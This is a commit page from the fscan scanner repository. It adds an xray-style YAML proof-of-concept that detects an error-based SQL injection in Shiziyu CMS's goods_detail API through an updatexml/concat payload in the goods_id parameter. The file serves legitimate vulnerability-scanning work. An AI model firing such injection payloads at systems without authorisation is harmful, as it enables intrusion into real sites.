mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 21:21:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,12 @@
|
||||
name: poc-yaml-shiziyu-cms-apicontroller-sqli
|
||||
set:
|
||||
rand: randomInt(200000000, 210000000)
|
||||
rules:
|
||||
- method: GET
|
||||
path: /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)
|
||||
expression:
|
||||
response.status == 404 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
|
||||
detail:
|
||||
author: sakura404x
|
||||
links:
|
||||
- https://blog.csdn.net/weixin_42633229/article/details/117070546
|
||||
Reference in New Issue
Block a user